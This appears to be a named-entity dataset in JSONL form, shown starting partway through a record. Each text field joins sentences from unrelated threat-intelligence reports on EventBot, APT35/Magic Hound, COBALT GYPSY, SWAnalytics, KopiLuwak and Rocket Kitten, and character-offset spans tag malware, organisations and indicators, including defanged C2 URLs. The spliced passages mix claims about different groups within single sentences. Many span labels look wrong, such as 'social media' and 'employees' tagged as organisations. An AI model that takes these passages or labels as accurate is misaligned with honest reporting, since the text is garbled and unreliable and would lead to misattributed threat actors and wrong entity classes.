Since at least 2013 , the Iranian threat group FireEye tracks as APT33 has carried out a Cyber Espionage operation to collect information from defense , aerospace and petrochemical organizations .", "spans": [{"start": 261, "end": 274, "label": "Vulnerability"}, {"start": 292, "end": 317, "label": "Malware"}, {"start": 320, "end": 334, "label": "Malware"}, {"start": 433, "end": 440, "label": "Organization"}, {"start": 451, "end": 456, "label": "Organization"}, {"start": 529, "end": 536, "label": "Organization"}, {"start": 539, "end": 548, "label": "Organization"}, {"start": 553, "end": 580, "label": "Organization"}]} {"text": "EventBot Updated library naming convention EventBot New library naming convention . The well-crafted and socially engineered malicious documents then become the \ufb01rst stage of a long and mainly \ufb01leless infection chain that eventually delivers POWERSTATS , a signature PowerShell backdoor of this threat group . In early 2017 , Mandiant responded to an incident involving APT35 targeting an energy company .", "spans": [{"start": 43, "end": 51, "label": "Malware"}, {"start": 242, "end": 252, "label": "Malware"}, {"start": 267, "end": 286, "label": "Malware"}, {"start": 295, "end": 307, "label": "Organization"}, {"start": 326, "end": 334, "label": "Organization"}, {"start": 370, "end": 375, "label": "Organization"}, {"start": 389, "end": 403, "label": "Organization"}]} {"text": "Data Encryption The Curve25519 encryption algorithm was implemented as of EventBot Version 0.0.0.2 . This powerful backdoor can receive commands from the attackers , enabling it to ex\ufb01ltrate \ufb01les from the system it is running on , execute additional scripts , delete \ufb01les , and more . 
The attacker used a spear-phishing email containing a link to a fake resume hosted on a legitimate website that had been compromised .", "spans": [{"start": 74, "end": 82, "label": "Malware"}, {"start": 115, "end": 123, "label": "Malware"}, {"start": 181, "end": 195, "label": "Malware"}, {"start": 231, "end": 257, "label": "Malware"}, {"start": 260, "end": 271, "label": "Malware"}, {"start": 289, "end": 297, "label": "Organization"}]} {"text": "This encryption algorithm is an extra security layer for communicating with the C2 , an improvement over the previous version of a plain RC4 encryption . If the macros in SPK KANUN DE\u011e\u0130\u015e\u0130KL\u0130\u011e\u0130 G\u0130B G\u00d6R\u00dc\u015e\u00dc.doc\u201d are enabled , an embedded payload is decoded and saved in the %APPDATA% directory with the name CiscoAny.exe\u201d . APT35 also installed BROKEYOLK , a custom backdoor , to maintain persistence on the compromised host .", "spans": [{"start": 171, "end": 180, "label": "Malware"}, {"start": 305, "end": 318, "label": "Malware"}, {"start": 321, "end": 326, "label": "Organization"}, {"start": 356, "end": 371, "label": "Malware"}]} {"text": "When reviewing the decrypted packet , it \u2019 s clear it has the same content as previous versions . INF \ufb01les have been used in the past by MuddyWater , although they were launched using Advpack.dll and not IEAdvpack.dll . They then proceeded to log directly into the VPN using the credentials of the compromised user .", "spans": [{"start": 98, "end": 106, "label": "System"}, {"start": 137, "end": 147, "label": "Organization"}, {"start": 184, "end": 195, "label": "System"}, {"start": 204, "end": 217, "label": "System"}, {"start": 265, "end": 268, "label": "System"}, {"start": 279, "end": 314, "label": "Malware"}]} {"text": "EventBot decryption of packets from the C2 Decryption of packets from the C2 using Curve25519 . 
In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document . The resume contained the PupyRAT backdoor , which communicated with known APT35 infrastructure .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 119, "end": 128, "label": "Malware"}, {"start": 165, "end": 175, "label": "Malware"}, {"start": 234, "end": 250, "label": "Malware"}, {"start": 283, "end": 288, "label": "Organization"}]} {"text": "EVENTBOT VERSION 0.3.0.1 Additional Assets Based on Country / Region EventBot-23aEventBot Spanish and Italian Images in Spanish and Italian added in version 0.3.0.1 . We assume that RunPow stands for run PowerShell , \u201d and triggers the PowerShell code embedded inside the .dll file . Once connected to the VPN , APT35 focused on stealing domain credentials from a Microsoft Active Directory Domain Controller to allow them to authenticate to the single-factor VPN and Office 365 instance .", "spans": [{"start": 204, "end": 214, "label": "Malware"}, {"start": 272, "end": 281, "label": "Malware"}, {"start": 306, "end": 309, "label": "System"}, {"start": 312, "end": 317, "label": "Organization"}, {"start": 364, "end": 373, "label": "Organization"}, {"start": 460, "end": 463, "label": "System"}]} {"text": "Version 0.3.0.1 includes Italian and Spanish language compatibility within the resources section . The main delivery method of this type of backdoor is spear phishing emails or spam that uses social engineering to manipulate targets into enabling malicious documents . While having access to the organization 's environment , the Magic Hound targeted data related to entities in the Middle East .", "spans": [{"start": 140, "end": 148, "label": "Malware"}]} {"text": "Presumably , this was done to make the app seem more credible to targeted users in different countries . This includes Python scripts . 
Mandiant has previously observed targeted attackers stealing email , but few threat actors have been as successful at this as APT35 .", "spans": [{"start": 136, "end": 144, "label": "Organization"}, {"start": 178, "end": 187, "label": "Organization"}, {"start": 197, "end": 202, "label": "System"}, {"start": 220, "end": 226, "label": "Organization"}, {"start": 262, "end": 267, "label": "Organization"}]} {"text": "Grabbing the Screen PIN with Support for Samsung Devices Version 0.3.0.1 added an ~800 line long method called grabScreenPin , which uses accessibility features to track pin code changes in the device \u2019 s settings . Usually , the Stageless Meterpreter has the Ext_server_stdapi.x64.dll\u201d , Ext_server_extapi.x64.dll\u201d , and Ext_server_espia.x64.dll\u201d extensions . The campaigns delivered PupyRAT , an open-source cross-platform remote access trojan ( RAT ) .", "spans": [{"start": 41, "end": 48, "label": "Organization"}, {"start": 230, "end": 251, "label": "Malware"}, {"start": 260, "end": 286, "label": "Malware"}, {"start": 289, "end": 315, "label": "Malware"}, {"start": 322, "end": 347, "label": "Malware"}, {"start": 385, "end": 392, "label": "Malware"}, {"start": 425, "end": 445, "label": "Malware"}, {"start": 448, "end": 451, "label": "Malware"}]} {"text": "It listens to events like TYPE_VIEW_TEXT_CHANGED . However , Kaspersky Security Network (KSN) records also contain links that victims clicked from the Outlook web client outlook.live.com\u201d as well as attachments arriving through the Outlook desktop application . 
Ultimately , APT35 had used access to hundreds of mailboxes to read email communications and steal data related to Middle East organizations , which later became victims of destructive attacks .", "spans": [{"start": 61, "end": 70, "label": "Organization"}, {"start": 170, "end": 187, "label": "Malware"}, {"start": 275, "end": 280, "label": "Organization"}, {"start": 330, "end": 350, "label": "Organization"}]} {"text": "We suspect the updated PIN is sent to the C2 , most likely to give the malware the option to perform privileged activities on the infected device related to payments , system configuration options , etc . The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx\u201d . CTU researchers observed likely unsuccessful phishing campaigns being followed by highly targeted spearphishing and social engineering attacks from a threat actor using the name Mia Ash .", "spans": [{"start": 209, "end": 219, "label": "Malware"}, {"start": 220, "end": 226, "label": "Malware"}, {"start": 252, "end": 259, "label": "Malware"}, {"start": 434, "end": 437, "label": "Organization"}, {"start": 612, "end": 619, "label": "Organization"}]} {"text": "EventBot Listening to TYPE_VIEW_TEXT_CHANGED accessibility event Listening to TYPE_VIEW_TEXT_CHANGED accessibility event . We identified two methods to deliver the KerrDown downloader to targets . Further analysis revealed a well-established collection of fake social media profiles that appear intended to build trust and rapport with potential victims .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 123, "end": 125, "label": "Organization"}, {"start": 164, "end": 172, "label": "Malware"}, {"start": 261, "end": 273, "label": "Organization"}]} {"text": "After collecting the changed PIN code , it is sent back to the C2 . 
The link to the final payload of KerrDown was still active during the time of analysis and hence we were able to download a copy which turned out to be a variant of Cobalt Strike Beacon . COBALT GYPSY has used spearphishing to target telecommunications , government , defense , oil , and financial services organizations based in or affiliated with the MENA region , identifying individual victims through social media sites .", "spans": [{"start": 101, "end": 109, "label": "Malware"}, {"start": 165, "end": 167, "label": "Organization"}, {"start": 256, "end": 268, "label": "Organization"}, {"start": 302, "end": 320, "label": "Organization"}, {"start": 323, "end": 333, "label": "Organization"}, {"start": 336, "end": 343, "label": "Organization"}, {"start": 346, "end": 349, "label": "Organization"}, {"start": 356, "end": 388, "label": "Organization"}, {"start": 447, "end": 465, "label": "Organization"}, {"start": 474, "end": 486, "label": "Organization"}]} {"text": "EventBot Sending the pin code back to the C2 Sending the pin code back to the C2 . While investigating KerrDown we found multiple RAR files containing a variant of the malware . The connections associated with these profiles indicate the threat actor began using the persona to target organizations in April 2016 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 103, "end": 111, "label": "Malware"}, {"start": 112, "end": 114, "label": "Organization"}]} {"text": "Eventually , the screen PIN preferences will be saved to an additional XML file in the shared preferences folder . The dropped PE file has the distinctive file name 8.t\u201d . 
Between December 28 , 2016 and January 1 , 2017 , CTU researchers observed a phishing campaign targeting Middle Eastern organizations .", "spans": [{"start": 127, "end": 129, "label": "System"}, {"start": 165, "end": 169, "label": "Malware"}, {"start": 222, "end": 225, "label": "Organization"}]} {"text": "EventBot screenPinPrefs.xml The content of screenPinPrefs.xml . The malware was first seen packed with VMProtect; when unpacked the sample didn\u2019t show any similarities with previously known malware . The macro ran a PowerShell command that attempted to download additional PowerShell loader scripts for PupyRAT , a research and penetration-testing tool that has been used in attacks .", "spans": [{"start": 9, "end": 27, "label": "Indicator"}, {"start": 43, "end": 61, "label": "Indicator"}, {"start": 68, "end": 75, "label": "Malware"}, {"start": 103, "end": 113, "label": "Malware"}, {"start": 216, "end": 234, "label": "Malware"}, {"start": 273, "end": 283, "label": "System"}, {"start": 303, "end": 310, "label": "Malware"}, {"start": 315, "end": 352, "label": "Malware"}]} {"text": "The grabScreenPin method has separate conditioning to handle screen lock events in Samsung devices . The malware starts communicating with the C&C server by sending basic information about the infected machine . The survey contained macros that , once enabled , downloaded PupyRAT .", "spans": [{"start": 83, "end": 90, "label": "Organization"}, {"start": 105, "end": 112, "label": "Malware"}, {"start": 120, "end": 146, "label": "Malware"}, {"start": 273, "end": 280, "label": "Malware"}]} {"text": "EventBot screen lock with support for Samsung devices A new method to handle screen lock with support for Samsung devices . The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . 
CTU researchers determined that the COBALT GYPSY threat group orchestrated this activity due to the tools , techniques , and procedures ( TTPs ) used in both campaigns .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 38, "end": 45, "label": "Organization"}, {"start": 106, "end": 113, "label": "Organization"}, {"start": 128, "end": 135, "label": "Malware"}, {"start": 146, "end": 154, "label": "Malware"}, {"start": 164, "end": 178, "label": "System"}, {"start": 196, "end": 205, "label": "Organization"}, {"start": 294, "end": 297, "label": "Organization"}, {"start": 330, "end": 342, "label": "Organization"}]} {"text": "EVENTBOT VERSION 0.4.0.1 Package Name Randomization In this version , the package name is no longer named \u2018 com.example.eventbot \u2019 , which makes it more difficult to track down . This time the document purported to be about the involvement of the Emir of Qatar in funding ISIS , which was seemingly copied from a website critical of Qatar . The Magic Hound has repeatedly used social media to identify and interact with employees at targeted organizations and then used weaponized Excel documents .", "spans": [{"start": 108, "end": 128, "label": "Indicator"}, {"start": 193, "end": 201, "label": "Malware"}, {"start": 377, "end": 389, "label": "Organization"}, {"start": 420, "end": 429, "label": "Organization"}]} {"text": "EventBot Randomized package name Randomized package name instead of com.example.eventbot . The SDK , named SWAnalytics is integrated into seemingly innocent Android applications published on major 3rd party Chinese app stores such as Tencent MyApp , Wandoujia , Huawei App Store , and Xiaomi App Store . 
The group has repeatedly used social media , particularly LinkedIn , to identify and interact with employees at targeted organizations , and then used weaponized Excel documents to deliver RATs such as PupyRAT .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 68, "end": 88, "label": "Indicator"}, {"start": 95, "end": 98, "label": "System"}, {"start": 107, "end": 118, "label": "Malware"}, {"start": 234, "end": 247, "label": "Organization"}, {"start": 250, "end": 259, "label": "Organization"}, {"start": 262, "end": 278, "label": "Organization"}, {"start": 285, "end": 301, "label": "Organization"}, {"start": 334, "end": 346, "label": "Organization"}, {"start": 493, "end": 497, "label": "Malware"}, {"start": 506, "end": 513, "label": "Malware"}]} {"text": "ProGuard Obfuscation As with many other Android applications , EventBot is now using obfuscation . After app installation , whenever SWAnalytics senses victims opening up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers . By compromising a user account that has administrative or elevated access , Magic Hound can quickly access a targeted environment to achieve their objectives .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 40, "end": 47, "label": "System"}, {"start": 63, "end": 71, "label": "Malware"}, {"start": 133, "end": 144, "label": "Malware"}, {"start": 233, "end": 240, "label": "Malware"}]} {"text": "Both the loader and dropped class are obfuscated using ProGuard , which obfuscates names using alphabet letters . This module monitors a wide range of device activities including application installation / remove / update , phone restart and battery charge . 
These characteristics suggest that COBALT GYPSY executed the January and February phishing campaigns and that it created the Mia Ash persona .", "spans": [{"start": 55, "end": 63, "label": "Indicator"}, {"start": 119, "end": 125, "label": "Malware"}, {"start": 179, "end": 203, "label": "Malware"}, {"start": 206, "end": 212, "label": "Malware"}, {"start": 215, "end": 221, "label": "Malware"}, {"start": 224, "end": 237, "label": "Malware"}, {"start": 242, "end": 256, "label": "Malware"}, {"start": 294, "end": 306, "label": "Organization"}, {"start": 384, "end": 391, "label": "Organization"}]} {"text": "The code itself is not modified by this type of obfuscation though , making the analysis easier . It turns out that contacts data isn\u2019t the only unusual data SWAnalytics is interested in . CTU researchers have observed multiple COBALT GYPSY campaigns since 2015 and consider it highly likely that the group is associated with Iranian government-directed cyber operations .", "spans": [{"start": 116, "end": 129, "label": "Malware"}, {"start": 158, "end": 169, "label": "Malware"}, {"start": 189, "end": 192, "label": "Organization"}]} {"text": "EventBot Obfuscated class names Obfuscated class names using letters of the alphabet . With default settings , SWAnalytics will scan through an Android device\u2019s external storage , looking for directory tencent/MobileQQ/WebViewCheck\u201d . The use of the Mia Ash persona demonstrates the creativity and persistence that threat actors employ to compromise targets .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 111, "end": 122, "label": "Malware"}, {"start": 128, "end": 132, "label": "Malware"}, {"start": 250, "end": 257, "label": "Malware"}, {"start": 322, "end": 328, "label": "Organization"}]} {"text": "Hidden Configuration Data As mentioned above , EventBot begins using obfuscation . 
From our first malicious sample encounter back in mid-September until now , we have observed 12 infected applications , the majority of which are in the system utility category . CTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering .", "spans": [{"start": 47, "end": 55, "label": "Malware"}, {"start": 98, "end": 114, "label": "Malware"}, {"start": 262, "end": 265, "label": "Organization"}, {"start": 292, "end": 304, "label": "Organization"}, {"start": 387, "end": 405, "label": "Organization"}]} {"text": "Due to this obfuscation , a part of the previously mentioned cfg class is now mapped to c/b/a/a/a or c/a/a/a/a . By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device . The persistent use of social media to identify and manipulate victims indicates that COBALT GYPSY successfully achieves its objectives using this tactic .", "spans": [{"start": 116, "end": 135, "label": "Malware"}, {"start": 138, "end": 149, "label": "Malware"}, {"start": 161, "end": 178, "label": "Malware"}, {"start": 244, "end": 256, "label": "Organization"}, {"start": 307, "end": 319, "label": "Organization"}]} {"text": "EventBot C2 URLs C2 URLs and other settings in a nested class . To make this data harvesting operation flexible , SWAnalytics equips the ability to receive and process configuration files from a remote Command-and-Control . 
COBALT GYPSY 's continued social media use reinforces the importance of recurring social engineering training .", "spans": [{"start": 114, "end": 125, "label": "Malware"}, {"start": 148, "end": 155, "label": "Malware"}, {"start": 160, "end": 187, "label": "Malware"}, {"start": 195, "end": 201, "label": "Malware"}, {"start": 224, "end": 236, "label": "Organization"}, {"start": 250, "end": 262, "label": "Organization"}, {"start": 306, "end": 324, "label": "Organization"}]} {"text": "Other configuration data is located elsewhere , and some of it can been seen here : The encrypted library path The output folder on the device for the dropped library The name of the library after it is loaded eventBot name string Version number A string used as an RC4 key , both for decrypting the library and as a part of the network data encryption ( hasn \u2019 t changed from the previous version ) The C2 URLs A randomized class name using the device \u2019 s accessibility services EventBot extracted configuration Part of the extracted configuration of the new version Whenever users reboot their device or open up Network Speed Master , SWAnalytics will fetch the latest configuration file from http[:]//mbl[.]shunwang[.]com/cfg/config[.]json\u201d . SecureWorks Counter Threat Unit ( CTU ) researchers analyzed a phishing campaign that targeted a Middle Eastern organization in early January 2017 .", "spans": [{"start": 480, "end": 488, "label": "Malware"}, {"start": 637, "end": 648, "label": "Malware"}, {"start": 746, "end": 777, "label": "Organization"}, {"start": 780, "end": 783, "label": "Organization"}, {"start": 858, "end": 870, "label": "Organization"}]} {"text": ". In order to understand SWAnalytics\u2019 impact , we turned to public download volume data available on Chandashi , one of the app store optimization vendors specialized in Chinese mobile application markets . 
SecureWorks\u00ae Counter Threat Unit\u2122 ( CTU ) researchers analyzed a phishing campaign that targeted a Middle Eastern organization in early January 2017 .", "spans": [{"start": 25, "end": 37, "label": "Malware"}, {"start": 207, "end": 240, "label": "Organization"}, {"start": 243, "end": 246, "label": "Organization"}, {"start": 321, "end": 333, "label": "Organization"}]} {"text": "MALWARE UNDER ACTIVE DEVELOPMENT EventBot \u201c cfg \u201d class EventBot \u201c cfg \u201d class . According to Cheetah Mobile\u2019s follow-up investigation , fraudulent behaviors came from two 3rd party SDKs Batmobi , Duapps integrated inside Cheetah SDK . CTU analysis suggests this activity is related to Iranian threat actors closely aligned with or acting on behalf of the COBALT GYPSY threat group ( formerly labeled Threat Group-2889 ) .", "spans": [{"start": 33, "end": 41, "label": "Malware"}, {"start": 56, "end": 64, "label": "Malware"}, {"start": 187, "end": 194, "label": "Malware"}, {"start": 197, "end": 203, "label": "Malware"}, {"start": 222, "end": 233, "label": "Malware"}, {"start": 236, "end": 239, "label": "Organization"}, {"start": 301, "end": 307, "label": "Organization"}, {"start": 356, "end": 368, "label": "Organization"}, {"start": 401, "end": 418, "label": "Organization"}]} {"text": "EventBot is in constant development , as seen with the botnetID string above , which shows consecutive numbering across versions . It is likely a new campaign or actor started using Panda Banker since in addition to the previously unseen Japanese targeting , Arbor has not seen any indicator of compromise (IOC) overlaps with previous Panda Banker campaigns . 
Since early 2014 , an attacker group of Iranian origin has been actively targeting persons of interest by means of malware infection , supported by persistent spear phishing campaigns .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 162, "end": 167, "label": "Organization"}, {"start": 182, "end": 194, "label": "System"}, {"start": 259, "end": 264, "label": "Organization"}, {"start": 335, "end": 347, "label": "Malware"}]} {"text": "This example is from a later version of EventBot , and in other versions the naming convention is very similar , with bot IDs such as word100 , word101 , word102 , and test2005 , test2006 etc . Webinjects targeting Japan , a country we haven\u2019t seen targeted by Panda Banker before . This cyber-espionage group was dubbed ' Rocket Kitten ' , and remains active as of this writing , with reported attacks as recent as October 2015 .", "spans": [{"start": 40, "end": 48, "label": "Malware"}, {"start": 261, "end": 273, "label": "Malware"}, {"start": 323, "end": 336, "label": "Organization"}]} {"text": "In the latest version , a layer of obfuscation was added , perhaps taking the malware one step closer to being fully operational . Japan is no stranger to banking malware . Characterized by relatively unsophisticated technical merit and extensive use of spear phishing , the Magic Hound targeted individuals and organizations in the Middle East ( including targets inside Iran itself ) , as well as across Europe and in the United States .", "spans": [{"start": 155, "end": 162, "label": "Malware"}, {"start": 163, "end": 170, "label": "Malware"}, {"start": 201, "end": 232, "label": "Malware"}]} {"text": "SUSPECTED DETECTION TESTS BY THE THREAT ACTOR In searching for EventBot , we \u2019 ve identified multiple submissions from the same submitter hash , 22b3c7b0 : EventBot 22b3c7b0 submitter hash The 22b3c7b0 submitter hash that submitted most of the EventBot samples to VirusTotal . 
Based on recent reports , the country has been plagued by attacks using the Ursnif and Urlzone banking malware . The May 2014 ' Operation Saffron Rose ' publication identifies an Iranian hacking group formerly named ' Ajax Security ' ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": [{"start": 63, "end": 71, "label": "Malware"}, {"start": 145, "end": 153, "label": "Indicator"}, {"start": 156, "end": 164, "label": "Malware"}, {"start": 165, "end": 173, "label": "Indicator"}, {"start": 193, "end": 201, "label": "Indicator"}, {"start": 244, "end": 252, "label": "Malware"}, {"start": 353, "end": 359, "label": "Malware"}, {"start": 364, "end": 371, "label": "Malware"}, {"start": 495, "end": 508, "label": "Organization"}, {"start": 526, "end": 539, "label": "Organization"}, {"start": 545, "end": 556, "label": "Organization"}, {"start": 611, "end": 621, "label": "Organization"}]} {"text": "This submitter has thousands of other submissions in VirusTotal , however , it is the only one that continues to submit EventBot samples via the VirusTotal API . This post was our first analysis of the first Panda Banker campaign that we\u2019ve seen to target financial institutions in Japan . 
An Iranian hacking group formerly named Ajax Security ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": [{"start": 120, "end": 128, "label": "Malware"}, {"start": 208, "end": 220, "label": "Malware"}, {"start": 256, "end": 278, "label": "Organization"}, {"start": 330, "end": 343, "label": "Organization"}, {"start": 359, "end": 372, "label": "Organization"}, {"start": 378, "end": 389, "label": "Organization"}, {"start": 444, "end": 454, "label": "Organization"}]} {"text": "Also , the botnet IDs increment over time as they are submitted . We believe the iOS malware gets installed on already compromised systems , and it is very similar to next stage SEDNIT malware we have found for Microsoft Windows\u2019 systems . The report specifies the Magic Hound targeted political , military and defense industry in the US , UK and Israel .", "spans": [{"start": 66, "end": 68, "label": "Organization"}, {"start": 178, "end": 184, "label": "Malware"}, {"start": 286, "end": 295, "label": "Organization"}, {"start": 298, "end": 306, "label": "Organization"}, {"start": 311, "end": 327, "label": "Organization"}]} {"text": "Given this , and the naming convention of the submissions ( .virus ) , the submitter hash most likely belongs to an AV vendor or sandboxing environment that automatically submits samples to online malware databases . One is called XAgent detected as IOS_XAGENT.A and the other one uses the name of a legitimate iOS game , MadCap detected as IOS_ XAGENT.B . 
ClearSky 's September 2014 blog post first described active attacks using a piece of malware they dubbed ' Gholee ' ( as appears in a malicious payload export function , potentially named after a popular Iranian singer9 ) .", "spans": [{"start": 231, "end": 237, "label": "Malware"}, {"start": 250, "end": 262, "label": "Malware"}, {"start": 322, "end": 328, "label": "Malware"}, {"start": 346, "end": 354, "label": "Malware"}, {"start": 357, "end": 365, "label": "Organization"}, {"start": 464, "end": 470, "label": "Malware"}]} {"text": "It may be that these submissions are made from the author \u2019 s machine , or that they submit it to a detection service that in turn submits to online malware databases . Madcap\u201d is similar to the XAgent malware , but the former is focused on recording audio . The Rocket Kitten attacker group 's main attack vector is spear-phishing .", "spans": [{"start": 169, "end": 176, "label": "Malware"}, {"start": 195, "end": 201, "label": "Malware"}, {"start": 263, "end": 276, "label": "Organization"}]} {"text": "EVENTBOT THREAT ACTORS As a part of this investigation , the Cybereason Nocturnus team has attempted to identify the threat actors behind the development of EventBot . This full-blown spying framework consists of two packages named \u2018Tokyo\u2019 and \u2018Yokohama\u2019 . 
After learning of an active attack incident from the Rocket Kitten group on a customer network , Check Point researchers decided to actively join the investigation .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 61, "end": 81, "label": "Organization"}, {"start": 157, "end": 165, "label": "Malware"}, {"start": 232, "end": 239, "label": "Malware"}, {"start": 244, "end": 254, "label": "Malware"}, {"start": 310, "end": 329, "label": "Organization"}, {"start": 354, "end": 365, "label": "Organization"}]} {"text": "The evidence above suggests that EventBot is still in the development stage , and as such , is not likely to have been used for large attack campaigns thus far . Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue . As described in previous publications , the Rocket Kitten attackers make extensive use of various phishing schemes .", "spans": [{"start": 33, "end": 41, "label": "Malware"}, {"start": 199, "end": 207, "label": "Malware"}, {"start": 219, "end": 229, "label": "Malware"}, {"start": 338, "end": 351, "label": "Organization"}, {"start": 352, "end": 361, "label": "Organization"}]} {"text": "The Cybereason Nocturnus team is monitoring multiple underground platforms in an attempt to identify chatter relating to EventBot . The first confirmed date when TajMahal samples were seen on a victim\u2019s machine is August 2014 . 
While the recent paper from Trend Micro and ClearSky ( ' The Spy Kittens Are Back : Rocket Kitten 2 ' ) does extensively cover the campaign 's narrative , we aimed to seek confirmation that our analyzed attack was positively connected to the same campaign and set out to provide additional value and insight .", "spans": [{"start": 4, "end": 24, "label": "Organization"}, {"start": 121, "end": 129, "label": "Malware"}, {"start": 162, "end": 170, "label": "Malware"}, {"start": 256, "end": 267, "label": "Organization"}, {"start": 272, "end": 280, "label": "Organization"}, {"start": 289, "end": 300, "label": "Organization"}, {"start": 312, "end": 325, "label": "Organization"}]} {"text": "New malware is often introduced to underground communities by being promoted and sold or offered as a giveaway . More details about TajMahal are available to customers of the Kaspersky Intelligence Reporting service (contact intelreports@kaspersky.com) . As the Rocket Kitten group 's behavior was well characterized in previous publications ( see the recent report from Trend Micro and ClearSky ) .", "spans": [{"start": 132, "end": 140, "label": "Malware"}, {"start": 175, "end": 184, "label": "Organization"}, {"start": 262, "end": 281, "label": "Organization"}, {"start": 371, "end": 382, "label": "Organization"}, {"start": 387, "end": 395, "label": "Organization"}]} {"text": "However , at the time of writing , we were unable to identify relevant conversations about the EventBot malware . The delivery of KopiLuwak in this instance is currently unknown as the MSIL dropper has only been observed by Proofpoint researchers on a public malware repository . 
Magic Hound will often find simpler ACTs for effective compromise , such as creative phishing and simple custom malware .", "spans": [{"start": 95, "end": 103, "label": "Malware"}, {"start": 185, "end": 197, "label": "Malware"}, {"start": 224, "end": 234, "label": "Organization"}]} {"text": "This strengthens our suspicion that this malware is still undergoing development and has not been officially marketed or released yet . The earliest step in any possible attack(s) involving this variant of KopiLuwak of which Proofpoint researchers are currently aware begin with the MSIL dropper . We present the connection between Behzad Mesri , an Iranian national recently indicted for his involvement in hacking HBO , and Charming Kitten .", "spans": [{"start": 206, "end": 215, "label": "Malware"}, {"start": 283, "end": 295, "label": "Malware"}, {"start": 332, "end": 344, "label": "Organization"}, {"start": 426, "end": 441, "label": "Organization"}]} {"text": "EVENTBOT INFRASTRUCTURE By mapping the C2 servers , a clear , repeated pattern emerges based on the specific URL gate_cb8a5aea1ab302f0_c . The basic chain of events upon execution of the MSIL dropper include dropping and executing both a PDF decoy and a Javascript (JS) dropper . Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as Oilrig1 and CopyKittens2 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 187, "end": 199, "label": "Malware"}, {"start": 254, "end": 277, "label": "Malware"}, {"start": 492, "end": 505, "label": "Organization"}, {"start": 516, "end": 523, "label": "Organization"}, {"start": 528, "end": 540, "label": "Organization"}]} {"text": "As of this writing , all the domains were registered recently and some are already offline . 
As explained in further detail below , the JS dropper ultimately installs a JS decryptor onto an infected machine that will then finally decrypt and execute the actual KopiLuwak backdoor in memory only . A case of these obscure lines can be found in a blogpost published in coordination and parallel to this report - \" Flying Kitten to Rocket Kitten , A Case of Ambiguity and Shared Code \" 3 by Collin Anderson and Claudio Guarnieri .", "spans": [{"start": 136, "end": 146, "label": "Malware"}, {"start": 169, "end": 181, "label": "Malware"}, {"start": 261, "end": 270, "label": "Malware"}, {"start": 412, "end": 425, "label": "Organization"}, {"start": 429, "end": 442, "label": "Organization"}]} {"text": "URL Status IP Domain registration date http : //ora.studiolegalebasili [ . As Proofpoint has not yet observed this attack in the wild it is likely that there is an additional component that leads to the execution of the MSIL payload . FireEye 's publication of \" Operation Saffron Rose \" report , which described Flying Kitten 's operations against aviation firms , led to the dismantling of Flying Kitten 's infrastructure and the apparent end of its activities .", "spans": [{"start": 39, "end": 74, "label": "Indicator"}, {"start": 78, "end": 88, "label": "Organization"}, {"start": 220, "end": 232, "label": "Malware"}, {"start": 235, "end": 242, "label": "Organization"}, {"start": 313, "end": 326, "label": "Organization"}, {"start": 349, "end": 363, "label": "Organization"}, {"start": 392, "end": 405, "label": "Organization"}]} {"text": "] com/gate_cb8a5aea1ab302f0_c offline 31.214.157 [ . The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine . 
To sum up , the HBO hacker - Behzad Mesri is a member of Turk Black Hat along with ArYaIeIrAn , who provides infrastructure for Charming Kitten activity via PersianDNS / Mahanserver together with Mohammad Rasoul Akbari , who is a Facebook friend of Behzad Mesri 's .", "spans": [{"start": 38, "end": 52, "label": "Indicator"}, {"start": 74, "end": 83, "label": "Malware"}, {"start": 102, "end": 120, "label": "Malware"}, {"start": 143, "end": 160, "label": "Malware"}, {"start": 223, "end": 229, "label": "Organization"}, {"start": 232, "end": 244, "label": "Organization"}, {"start": 260, "end": 274, "label": "Organization"}, {"start": 286, "end": 296, "label": "Organization"}, {"start": 360, "end": 370, "label": "Malware"}, {"start": 373, "end": 384, "label": "Malware"}, {"start": 433, "end": 441, "label": "Organization"}, {"start": 452, "end": 464, "label": "Organization"}]} {"text": "] 6 2020-02-29 http : //themoil [ . We didn\u2019t choose to name it after a vegetable; the .NET malware developers named it Topinambour themselves . Charming kitten regularly target international media outlets with Persian-language services .", "spans": [{"start": 15, "end": 35, "label": "Indicator"}, {"start": 87, "end": 99, "label": "Malware"}, {"start": 120, "end": 131, "label": "Malware"}, {"start": 145, "end": 160, "label": "Organization"}, {"start": 192, "end": 197, "label": "Organization"}]} {"text": "] site/gate_cb8a5aea1ab302f0_c online 208.91.197 [ . The role of the .NET module is to deliver the known KopiLuwak JavaScript Trojan . 
